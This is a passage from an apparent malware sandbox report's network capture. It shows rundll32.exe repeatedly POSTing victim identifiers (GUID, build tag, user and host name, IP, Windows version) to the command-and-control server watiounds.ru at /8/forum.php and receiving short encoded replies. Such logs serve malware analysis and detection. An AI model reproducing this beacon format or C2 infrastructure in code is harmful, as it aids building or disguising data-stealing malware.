                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:15.937107086 CEST458INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 47 54 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYGTBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          379192.168.2.224954495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:16.260979891 CEST459OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:16.387821913 CEST459INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFFUUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          38192.168.2.224920395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:40.546120882 CEST78OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:40.675393105 CEST78INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 41 5a 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTAZGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          380192.168.2.224954595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:16.714250088 CEST460OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:16.836950064 CEST461INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTHSGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          381192.168.2.224954695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:17.142498016 CEST461OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:17.265283108 CEST462INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 43 58 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCCXXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          382192.168.2.224954795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:17.593389034 CEST463OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:17.715223074 CEST463INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJKPQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          383192.168.2.224954895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:18.040235043 CEST464OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:18.166444063 CEST464INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          384192.168.2.224954995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:18.512223959 CEST465OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:18.652337074 CEST465INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZJQAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          385192.168.2.224955095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:18.975775957 CEST466OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:19.099287987 CEST466INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQZAJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          386192.168.2.224955195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:19.414419889 CEST467OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:19.543034077 CEST467INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKYBPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          387192.168.2.224955295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:19.866071939 CEST468OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:19.991341114 CEST468INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 41 5a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQAZJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          388192.168.2.224955395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:20.322063923 CEST469OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:20.449620962 CEST470INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTNMGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          389192.168.2.224955495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:20.772947073 CEST470OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:20.895773888 CEST471INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQFUJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          39192.168.2.224920495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:41.014056921 CEST79OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:41.142589092 CEST79INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          390192.168.2.224955595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:21.232877970 CEST472OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:21.356631994 CEST472INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFVEUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          391192.168.2.224955695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:21.675245047 CEST473OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:21.807295084 CEST473INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          392192.168.2.224955795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:22.122312069 CEST474OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:22.244584084 CEST474INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          393192.168.2.224955895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:22.560925961 CEST475OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:22.684420109 CEST475INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 54 47 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJTGQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          394192.168.2.224955995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:24:23.007167101 CEST476OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
